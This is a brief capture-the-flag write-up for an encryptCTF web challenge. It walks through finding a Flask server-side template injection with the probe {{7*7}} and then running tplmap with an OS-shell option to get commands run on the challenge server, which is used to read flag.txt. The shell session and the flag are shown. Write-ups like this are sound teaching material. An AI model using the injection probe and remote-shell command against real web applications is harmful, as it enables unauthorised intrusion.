Rating: 0

There were some base64 encoded comments in the HTML source code. One of the comment leads to: http://104.154.106.182:5050/?secret=flag

If you look to the HTML source, there is "flag" string. So what about:

http://104.154.106.182:5050/?secret={{7*7}}

Then there is "49" in the source, so it is flask injection: https://github.com/epinna/tplmap

```
python tplmap.py -u http://104.154.106.182:5050/?secret=flag --os-shell

...
[+] Run commands on the operating system.
posix-linux $ ls
application.py
flag.txt
requirements.txt
static
templates
posix-linux $ cat flag.txt
encryptCTF{!nj3c7!0n5_4r3_b4D}
```